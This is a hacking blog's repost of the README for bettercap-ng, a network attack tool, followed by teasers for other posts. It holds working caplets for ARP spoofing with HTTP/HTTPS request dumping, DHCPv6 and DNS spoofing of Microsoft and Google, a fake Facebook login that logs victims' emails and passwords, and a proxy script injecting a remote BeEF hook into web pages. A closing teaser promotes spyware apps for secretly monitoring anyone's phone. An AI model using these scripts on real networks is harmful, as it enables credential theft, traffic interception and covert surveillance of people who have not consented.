bettercap-ng – complete reimplementation of bettercap

By
bettercap-ng
bettercap-ng is a complete reimplementation of bettercap, the Swiss army knife for network attacks and monitoring. It is faster, stabler, smaller, easier to install and to use.

Using it with Docker

In this repository, BetterCAP is containerized using Alpine Linux – a security-oriented, lightweight Linux distribution based on musl libc and busybox. The resulting Docker image is relatively small and easy to manage the dependencies.
To pull latest BetterCAP version of the image:
$ docker pull evilsocket/bettercap-ng
To run:
$ docker run -it --privileged --net=host evilsocket/bettercap-ng -h

Compilation

Make sure you have a correctly configured Go >= 1.8 environment, that $GOPATH/bin is in $PATH and the libpcap-dev package installed for your system, then:
$ go get github.com/evilsocket/bettercap-ng
To show the command line options:
$ sudo bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.

Cross Compilation

As an example, let’s cross compile bettercap for ARM (requires gcc-arm-linux-gnueabibyacc and flex packages).
Step 1: download and cross compile libpcap-1.8.1 for ARM (adjust PCAPV to use a different libpcap version):
cd /tmp
export PCAPV=1.8.1
wget http://www.tcpdump.org/release/libpcap-$PCAPV.tar.gz
tar xvf libpcap-$PCAPV.tar.gz
cd libpcap-$PCAPV
export CC=arm-linux-gnueabi-gcc
./configure --host=arm-linux --with-pcap=linux
make
Step 2: now cross compile bettercap-ng itself:
cd $GOPATH/src/github.com/evilsocket/bettercap-ng
env CC=arm-linux-gnueabi-gcc CGO_ENABLED=1 GOOS=linux GOARCH=arm CGO_LDFLAGS="-L/tmp/libpcap-$PCAPV" make
Done

Command Line Options

By issuing bettercap-ng -h the main command line options will be shown:
Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run one or more commands separated by ; in the interactive session, used to set variables via command line.
  -iface string
        Network interface to bind to, if empty the default interface will be auto selected.
  -no-history
        Disable interactive session history file.
  -silent
        Suppress all logs which are not errors.
If no -caplet option is specified, bettercap-ng will start in interactive mode.

Interactive Mode

By default, bettercap-ng will start in interactive mode, allowing you to start and stop modules manually, change options and apply new firewall rules on the fly, to show the help menu type help:
MAIN COMMANDS

              help MODULE : List available commands or show module specific help if no module name is provided.
                   active : Show information about active modules.
                     quit : Close the session and exit.
            sleep SECONDS : Sleep for the given amount of seconds.
                 get NAME : Get the value of variable NAME, use * for all.
           set NAME VALUE : Set the VALUE of variable NAME.
                    clear : Clear the screen.
           include CAPLET : Load and run this caplet in the current session.
                ! COMMAND : Execute a shell command and print its output.
           alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

MODULES
                 api.rest > not running
                arp.spoof > not running
              dhcp6.spoof > not running
                dns.spoof > not running
            events.stream > running
               http.proxy > not running
              http.server > not running
              https.proxy > not running
              mac.changer > not running
                net.probe > not running
                net.recon > running
                net.sniff > not running
                   ticker > not running
                      wol > not running
You can have module specific help by using help module-name (for instance try with help net.recon), to print all variables you can use get *.

Caplets

Interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look the caplets folder for more.

caplets/http-req-dump.cap

Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dump.js proxy script.
# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"

# to make it less verbose
# events.stream off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script caplets/http-req-dump.js
set http.proxy.script caplets/http-req-dump.js
clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on

caplets/netmon.cap

An example of how to use the ticker module, use this caplet to monitor activities on your network.
net.probe on
clear
ticker on

caplets/mitm6.cap

Reroute IPv4 DNS requests by using DHCPv6 replies, start a HTTP server and DNS spoofer for microsoft.com and google.com.
# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear

caplets/rest-api.cap

Start a rest API.
# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on

# enjoy /api/session and /api/events
api.rest on
Get information about the current session:
curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session
Execute a command in the current interactive session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'
Get last 50 events:
curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50
Clear events:
curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events

caplets/fb-phish.cap

This caplet will create a fake Facebook login page on port 80, intercept login attempts using the http.proxy, print credentials and redirect the target to the real Facebook.
Make sure to create the folder first:
$ cd caplets/www/
$ make

set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on
The caplets/fb-phish.js proxy script file:
function onRequest(req, res) {
    if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
        var form = req.ParseForm();
        var email = form["email"] || "?", 
            pass  = form["pass"] || "?";

        log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );

        res.Status      = 301;
        res.Headers     = "Location: https://www.facebook.com/\n" +
                          "Connection: close";
    }
}

caplets/beef-inject.cap

Use a proxy script to inject a BEEF javascript hook:
# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
The caplets/beef.inject.js proxy script file:
function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
        }
    }
}

License

bettercap and bettercap-ng are made with ♥ by Simone Margaritelli and they’re released under the GPL 3 license.
Thats For Knowldege>>>>>>>><<<<<<<<<

Stay With Us ......techkalilinux.blodspot.com

Popular posts from this blog

Best hacking apps 4u

By
Image
READ THIS ARTICLE CAREFULLY AND DOWNLOAD IT..... If you caught in illegal activity then techkalilinux.blogspot.com is not responsible for it.  its only of educational mean.. Angry IP Scanner It is a fast port and IP address scanner. It is a lightweight and cross-platform application that has the capacity to scan the IP addresses in any range and also in their ports. It simply pings each IP address. Packet Crafting To Exploit Firewall Weaknesses Through Packet crafting technique, an attacker capitalizes your firewall’s vulnerabilities. Here are some packet crafting tools Hping Earlier Hping was used as a security tool. Now it is used as a command-line oriented TCP/IP packet analyzer or assembler. You can use this for Firewall testing, advance port scanning, network testing by using fragmentation, TOS and different other protocols. Scapy It is a powerful and interactive packet manipulation program. Scapy has the capability to decode or forge the packets of
Read more

Want to learn Linux? Check out these top 5 best websites to learn Linux online

By
In this article, we bring to you some of the  top 5 websites  with the help of which you can  learn Linux online  easily. Linux programming This is one of the best websites to start learning about Linux. Here, you can get detailed information about how to develop Linux programs and administer Linux systems. It also has a comprehensive explanation for some of the FAQ’s like why is Linux important, the difference between Linux and Unix, etc. Linux.com ( The complete beginners guide to Linux ) With Linux.com, you can keep up with the news, discover new Linux apps, and find a way to join and contribute to the community. Most importantly, you can learn all about Linux. Thanks to helpful tips, tutorials, and answers to various questions from other users. Absolute beginners should start at the “New User Guides” page that explains the complete process of becoming a new Linux user. Linux.com, which is affiliated with the Linux Foundation, also offers online courses and training
Read more

How to Spy on Anyone's Smartphone Activity

By
Image
Some of the Apps for Tracking There are a number of apps available for tracking/spying on both  iOS  and  Android  platforms. Probably the best, and one that appears to be being used by Tyrell in this scene, is  FlexiSPY . It is available for either iOS, Android, BlackBerry, or Symbian. Some of its features are listed below from their website. The Premium FlexiSPY with all the features listed above costs $349 per year. But there are other numerous iPhone and Android spying packages available from other companies. These include: mSpy PhoneSheriff iKeyMonitor TheTruthSpy And many, many others Most of these apps will not be in your app store as they are considered malicious, but some will. Some limited-capability apps are available in your app store that will track, for instance, GPS location, something that an employer might want to track employees or a parent might want to track their child movements or locating a lost cell phone. These are all considered legitimate an
Read more